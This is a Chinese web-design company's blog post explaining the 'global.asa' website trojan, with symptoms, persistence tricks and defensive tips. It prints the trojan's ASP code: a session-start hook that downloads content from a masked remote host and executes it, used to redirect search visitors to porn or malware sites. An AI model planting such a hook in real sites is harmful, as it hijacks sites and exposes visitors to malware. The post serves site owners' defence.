十年专注于品牌网站建设 十年专注于品牌网站建设,低调、有情怀的网络应用服务商!
南昌百恒网络微信公众号 扫一扫关注
小程序
tel-icon全国服务热线:400-680-9298,0791-88117053
扫一扫关注百恒网络微信公众号
扫一扫打开百恒网络微信小程序

百恒网络

南昌百恒网络

global.asa木马病毒

百恒网络 2011-11-19 3029

什么是global.asa木马呢?

global.asa在百度百科里是这样介绍的:

Global.asa 文件是一个可选的文件,它可包含可被ASP 应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的浏览器脚本都能在Global.asa 中使用。 Global.asa 中,我们可以告知application 和session 对象在启动和结束时做什么事情。完成此项任务的代码被放置在事件操作器中。

根据上面的介绍大家应该大体了解了,其实这个木马就是属于网站程序木马,也称:脚本木马. 但是黑客为什么会以global.asa命名呢?因为这个文件可以调用很多程序,比如当客户访问你的网站的时候,可以调用跳转的命令。正因为global.asa文件作用的特殊性,所以被黑客所利用,并制作成了网站木马。

首先我们来看下global.asa木马的代码:

sub Session_OnStart

On Error Resume Next

url="http://www.********.info:1680/global/xmlfilecode.gif"

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

set objStream=Nothing

if instr(GetHtml,"by*aming")>0 then

execute GetHtml

end if

end sub

sub Session_OnEnd

end sub

< /script >

我来给大家先解释一下这个代码的作用:因为global.asa 文件是网站启动的文件,当一个网站被用户访问的时候,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问的时候自动下载获取木马内容,上面遇到的就是跳转性作用的木马代码。

global.asa挂马的症状

global.asa文件是隐藏性,你在FTP软件都看不到,通过地址栏输入FTP资料,进入网站空间直接可以看到隐藏global.asa的木马,当用户从百度点击进来的时候(直接输入网站地址却正常),网站的会自动跳转到其他网站:比如色情站点和有病毒的网站。再就是百度site:自己的网站会发现收录了许多色情页面如下图所示:

也有些其他的症状,例如:网站后台无法登陆,有的是提示 XX错误 然后刷新即可访问。这都是global.asa 劫持用户的访问指向。

global.asa 母级文件Global.asax功能更可怕,我们先看下代码

<%@ Language="VB"%><%@ Import Namespace="System.IO"%>

其中 if fso.FileExists("."&Server.MapPath("/Global.asa")) then 判断 根目录下 Global.asa 文件是否存在,如果存就将文件属性改为可读可写 代码:f.Attributes=0 然后进行写入危险代码(objwriter.write(CODE2)) 再次将文件设为只读,隐藏、系统属性f.Attributes=1+2+4,你想删除都没那么容易。即使你删除了创建一个文件夹改名为Global.asa也是毫无意义的。它很快把文件属改掉,覆盖掉。

global.asa木马详细解决方法:

1.要严格控制页面上传的代码,上传权限(包括文本编辑器FCKeditor等)重点防御之处.

2.后台登陆要加上验证码,

3.防Sql注入是必须的.

4.密码要经过MD5加密.

5.数据库扩展名改成普通网页名称并加密.

6.每个页面都要进行管理员登陆判断.

南昌网络公司百恒网络提醒广大站长或网络公司技术人员:别忘了要把所有可疑文件全部清除,有的病毒设置系统属性,需要服务器供应该商配下,或通过他们完善的后台进行清理.

详细解决方案请点击:南昌网站建设建议加强网站安全措施

专业,专注于南昌网站建设、软件开发,为用户提供高品质的网络产品和优质的服务是我们始终追求的目标!

希望本文对广大站长和网站建设公司技术人员有所帮助,如有不理解之处可以与南昌网站制作公司百恒网络技术部联系。


400-680-9298,0791-88117053
扫一扫关注百恒网络微信公众号
扫一扫打开百恒网络小程序

欢迎您的光顾,我们将竭诚为您服务×

售前咨询 售前咨询
 
售前咨询 售前咨询
 
售前咨询 售前咨询
 
售前咨询 售前咨询
 
售前咨询 售前咨询
 
售后服务 售后服务
 
售后服务 售后服务
 
备案专线 备案专线
 
×